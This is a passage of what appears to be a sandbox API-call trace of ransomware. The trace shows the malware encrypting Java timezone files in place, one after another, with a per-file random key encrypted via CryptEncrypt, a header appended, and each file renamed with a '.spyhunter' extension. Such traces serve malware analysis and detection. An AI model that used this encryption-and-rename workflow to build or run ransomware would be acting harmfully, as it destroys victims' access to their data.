(HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0170.022] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x57e5e8*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x57e5e8*=0x30) returned 1 [0170.022] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Paramaribo" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\paramaribo"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0170.023] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Paramaribo") returned 62 [0170.023] StrStrW (lpFirst="Paramaribo", lpSrch=".txt") returned 0x0 [0170.023] GetProcessHeap () returned 0x2c0000 [0170.023] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0170.023] ReadFile (in: hFile=0xa0, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57e5ac, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x57e5ac*=0x65, lpOverlapped=0x0) returned 1 [0170.024] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0xffffff9b, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0170.024] WriteFile (in: hFile=0xa0, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x65, lpNumberOfBytesWritten=0x57e5ac, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x57e5ac*=0x65, lpOverlapped=0x0) returned 1 [0170.024] GetProcessHeap () returned 0x2c0000 [0170.024] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0170.024] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0170.024] WriteFile (in: hFile=0xa0, lpBuffer=0x57e5ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57e5ac, lpOverlapped=0x0 | out: lpBuffer=0x57e5ec*, lpNumberOfBytesWritten=0x57e5ac*=0x4, lpOverlapped=0x0) returned 1 [0170.024] WriteFile (in: hFile=0xa0, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57e5ac, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x57e5ac*=0x30, lpOverlapped=0x0) returned 1 [0170.025] CloseHandle (hObject=0xa0) returned 1 [0170.025] GetProcessHeap () returned 0x2c0000 [0170.025] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0170.025] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Paramaribo.spyhunter") returned 72 [0170.025] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Paramaribo" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\paramaribo"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Paramaribo.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\paramaribo.spyhunter")) returned 1 [0170.026] GetProcessHeap () returned 0x2c0000 [0170.026] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35f878 | out: hHeap=0x2c0000) returned 1 [0170.026] GetProcessHeap () returned 0x2c0000 [0170.026] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0170.026] GetProcessHeap () returned 0x2c0000 [0170.026] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ed5168 | out: hHeap=0x2c0000) returned 1 [0170.026] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57e5e8 | out: pbBuffer=0x57e5e8) returned 1 [0170.026] GetProcessHeap () returned 0x2c0000 [0170.026] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0170.026] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x57e5e0*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x57e5e0*=0x30) returned 1 [0170.026] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Pangnirtung" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\pangnirtung"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0170.027] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Pangnirtung") returned 63 [0170.027] StrStrW (lpFirst="Pangnirtung", lpSrch=".txt") returned 0x0 [0170.027] GetProcessHeap () returned 0x2c0000 [0170.027] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0170.027] ReadFile (in: hFile=0xa0, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57e5a4, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x57e5a4*=0x434, lpOverlapped=0x0) returned 1 [0170.076] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0xfffffbcc, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0170.076] WriteFile (in: hFile=0xa0, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x434, lpNumberOfBytesWritten=0x57e5a4, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x57e5a4*=0x434, lpOverlapped=0x0) returned 1 [0170.076] GetProcessHeap () returned 0x2c0000 [0170.076] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0170.076] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0170.076] WriteFile (in: hFile=0xa0, lpBuffer=0x57e5e4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57e5a4, lpOverlapped=0x0 | out: lpBuffer=0x57e5e4*, lpNumberOfBytesWritten=0x57e5a4*=0x4, lpOverlapped=0x0) returned 1 [0170.076] WriteFile (in: hFile=0xa0, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57e5a4, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x57e5a4*=0x30, lpOverlapped=0x0) returned 1 [0170.076] CloseHandle (hObject=0xa0) returned 1 [0170.076] GetProcessHeap () returned 0x2c0000 [0170.077] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0170.077] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Pangnirtung.spyhunter") returned 73 [0170.077] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Pangnirtung" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\pangnirtung"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Pangnirtung.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\pangnirtung.spyhunter")) returned 1 [0170.078] GetProcessHeap () returned 0x2c0000 [0170.078] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35f878 | out: hHeap=0x2c0000) returned 1 [0170.078] GetProcessHeap () returned 0x2c0000 [0170.078] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0170.078] GetProcessHeap () returned 0x2c0000 [0170.078] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ed50a0 | out: hHeap=0x2c0000) returned 1 [0170.078] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57e5e8 | out: pbBuffer=0x57e5e8) returned 1 [0170.078] GetProcessHeap () returned 0x2c0000 [0170.078] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0170.078] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x57e5e0*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x57e5e0*=0x30) returned 1 [0170.079] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Panama" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\panama"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0170.079] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Panama") returned 58 [0170.080] StrStrW (lpFirst="Panama", lpSrch=".txt") returned 0x0 [0170.080] GetProcessHeap () returned 0x2c0000 [0170.080] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0170.080] ReadFile (in: hFile=0xa0, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57e5a4, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x57e5a4*=0x41, lpOverlapped=0x0) returned 1 [0170.081] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0xffffffbf, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0170.081] WriteFile (in: hFile=0xa0, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x41, lpNumberOfBytesWritten=0x57e5a4, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x57e5a4*=0x41, lpOverlapped=0x0) returned 1 [0170.081] GetProcessHeap () returned 0x2c0000 [0170.081] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0170.081] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0170.081] WriteFile (in: hFile=0xa0, lpBuffer=0x57e5e4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57e5a4, lpOverlapped=0x0 | out: lpBuffer=0x57e5e4*, lpNumberOfBytesWritten=0x57e5a4*=0x4, lpOverlapped=0x0) returned 1 [0170.081] WriteFile (in: hFile=0xa0, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57e5a4, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x57e5a4*=0x30, lpOverlapped=0x0) returned 1 [0170.081] CloseHandle (hObject=0xa0) returned 1 [0170.081] GetProcessHeap () returned 0x2c0000 [0170.081] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0170.082] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Panama.spyhunter") returned 68 [0170.082] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Panama" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\panama"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Panama.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\panama.spyhunter")) returned 1 [0170.086] GetProcessHeap () returned 0x2c0000 [0170.086] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35f878 | out: hHeap=0x2c0000) returned 1 [0170.086] GetProcessHeap () returned 0x2c0000 [0170.086] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0170.086] GetProcessHeap () returned 0x2c0000 [0170.086] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eb94c0 | out: hHeap=0x2c0000) returned 1 [0170.086] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57e5e0 | out: pbBuffer=0x57e5e0) returned 1 [0170.086] GetProcessHeap () returned 0x2c0000 [0170.086] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0170.086] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x57e5d8*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x57e5d8*=0x30) returned 1 [0170.086] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Ojinaga" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\ojinaga"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0170.087] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Ojinaga") returned 59 [0170.087] StrStrW (lpFirst="Ojinaga", lpSrch=".txt") returned 0x0 [0170.087] GetProcessHeap () returned 0x2c0000 [0170.087] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0170.087] ReadFile (in: hFile=0xa0, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57e59c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x57e59c*=0x330, lpOverlapped=0x0) returned 1 [0170.189] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0xfffffcd0, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0170.190] WriteFile (in: hFile=0xa0, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x330, lpNumberOfBytesWritten=0x57e59c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x57e59c*=0x330, lpOverlapped=0x0) returned 1 [0170.190] GetProcessHeap () returned 0x2c0000 [0170.190] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0170.190] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0170.190] WriteFile (in: hFile=0xa0, lpBuffer=0x57e5dc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57e59c, lpOverlapped=0x0 | out: lpBuffer=0x57e5dc*, lpNumberOfBytesWritten=0x57e59c*=0x4, lpOverlapped=0x0) returned 1 [0170.190] WriteFile (in: hFile=0xa0, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57e59c, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x57e59c*=0x30, lpOverlapped=0x0) returned 1 [0170.190] CloseHandle (hObject=0xa0) returned 1 [0170.190] GetProcessHeap () returned 0x2c0000 [0170.190] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0170.190] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Ojinaga.spyhunter") returned 69 [0170.190] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Ojinaga" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\ojinaga"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Ojinaga.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\ojinaga.spyhunter")) returned 1 [0170.191] GetProcessHeap () returned 0x2c0000 [0170.191] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35f878 | out: hHeap=0x2c0000) returned 1 [0170.191] GetProcessHeap () returned 0x2c0000 [0170.191] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0170.191] GetProcessHeap () returned 0x2c0000 [0170.191] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eb9400 | out: hHeap=0x2c0000) returned 1 [0170.191] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57e5e0 | out: pbBuffer=0x57e5e0) returned 1 [0170.191] GetProcessHeap () returned 0x2c0000 [0170.192] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0170.192] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x57e5d8*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x57e5d8*=0x30) returned 1 [0170.192] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\New_York" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\new_york"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0170.192] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\New_York") returned 60 [0170.192] StrStrW (lpFirst="New_York", lpSrch=".txt") returned 0x0 [0170.192] GetProcessHeap () returned 0x2c0000 [0170.192] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0170.192] ReadFile (in: hFile=0xa0, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57e59c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x57e59c*=0x7a8, lpOverlapped=0x0) returned 1 [0170.286] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0xfffff858, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0170.286] WriteFile (in: hFile=0xa0, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x7a8, lpNumberOfBytesWritten=0x57e59c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x57e59c*=0x7a8, lpOverlapped=0x0) returned 1 [0170.289] GetProcessHeap () returned 0x2c0000 [0170.289] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0170.289] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0170.289] WriteFile (in: hFile=0xa0, lpBuffer=0x57e5dc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57e59c, lpOverlapped=0x0 | out: lpBuffer=0x57e5dc*, lpNumberOfBytesWritten=0x57e59c*=0x4, lpOverlapped=0x0) returned 1 [0170.289] WriteFile (in: hFile=0xa0, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57e59c, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x57e59c*=0x30, lpOverlapped=0x0) returned 1 [0170.289] CloseHandle (hObject=0xa0) returned 1 [0170.289] GetProcessHeap () returned 0x2c0000 [0170.289] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0170.290] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\New_York.spyhunter") returned 70 [0170.290] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\New_York" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\new_york"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\New_York.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\new_york.spyhunter")) returned 1 [0170.293] GetProcessHeap () returned 0x2c0000 [0170.293] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35f878 | out: hHeap=0x2c0000) returned 1 [0170.293] GetProcessHeap () returned 0x2c0000 [0170.294] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0170.294] GetProcessHeap () returned 0x2c0000 [0170.294] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ed4fd8 | out: hHeap=0x2c0000) returned 1 [0170.294] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57e5d8 | out: pbBuffer=0x57e5d8) returned 1 [0170.294] GetProcessHeap () returned 0x2c0000 [0170.294] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0170.294] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x57e5d0*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x57e5d0*=0x30) returned 1 [0170.294] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Montserrat" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\montserrat"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0170.295] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Montserrat") returned 62 [0170.295] StrStrW (lpFirst="Montserrat", lpSrch=".txt") returned 0x0 [0170.295] GetProcessHeap () returned 0x2c0000 [0170.295] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0170.295] ReadFile (in: hFile=0xa0, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57e594, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x57e594*=0x41, lpOverlapped=0x0) returned 1 [0170.296] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0xffffffbf, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0170.296] WriteFile (in: hFile=0xa0, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x41, lpNumberOfBytesWritten=0x57e594, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x57e594*=0x41, lpOverlapped=0x0) returned 1 [0170.296] GetProcessHeap () returned 0x2c0000 [0170.296] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0170.296] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0170.297] WriteFile (in: hFile=0xa0, lpBuffer=0x57e5d4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57e594, lpOverlapped=0x0 | out: lpBuffer=0x57e5d4*, lpNumberOfBytesWritten=0x57e594*=0x4, lpOverlapped=0x0) returned 1 [0170.298] WriteFile (in: hFile=0xa0, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57e594, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x57e594*=0x30, lpOverlapped=0x0) returned 1 [0170.298] CloseHandle (hObject=0xa0) returned 1 [0170.298] GetProcessHeap () returned 0x2c0000 [0170.298] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0170.298] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Montserrat.spyhunter") returned 72 [0170.299] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Montserrat" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\montserrat"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Montserrat.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\montserrat.spyhunter")) returned 1 [0170.300] GetProcessHeap () returned 0x2c0000 [0170.300] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35f878 | out: hHeap=0x2c0000) returned 1 [0170.300] GetProcessHeap () returned 0x2c0000 [0170.300] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0170.300] GetProcessHeap () returned 0x2c0000 [0170.300] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ed4f10 | out: hHeap=0x2c0000) returned 1 [0170.300] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57e5d8 | out: pbBuffer=0x57e5d8) returned 1 [0170.300] GetProcessHeap () returned 0x2c0000 [0170.300] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0170.301] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x57e5d0*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x57e5d0*=0x30) returned 1 [0170.301] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Montreal" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\montreal"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0170.302] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Montreal") returned 60 [0170.302] StrStrW (lpFirst="Montreal", lpSrch=".txt") returned 0x0 [0170.302] GetProcessHeap () returned 0x2c0000 [0170.302] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0170.302] ReadFile (in: hFile=0xa0, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57e594, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x57e594*=0x788, lpOverlapped=0x0) returned 1 [0170.405] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0xfffff878, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0170.405] WriteFile (in: hFile=0xa0, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x788, lpNumberOfBytesWritten=0x57e594, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x57e594*=0x788, lpOverlapped=0x0) returned 1 [0170.406] GetProcessHeap () returned 0x2c0000 [0170.406] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0170.406] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0170.406] WriteFile (in: hFile=0xa0, lpBuffer=0x57e5d4*, 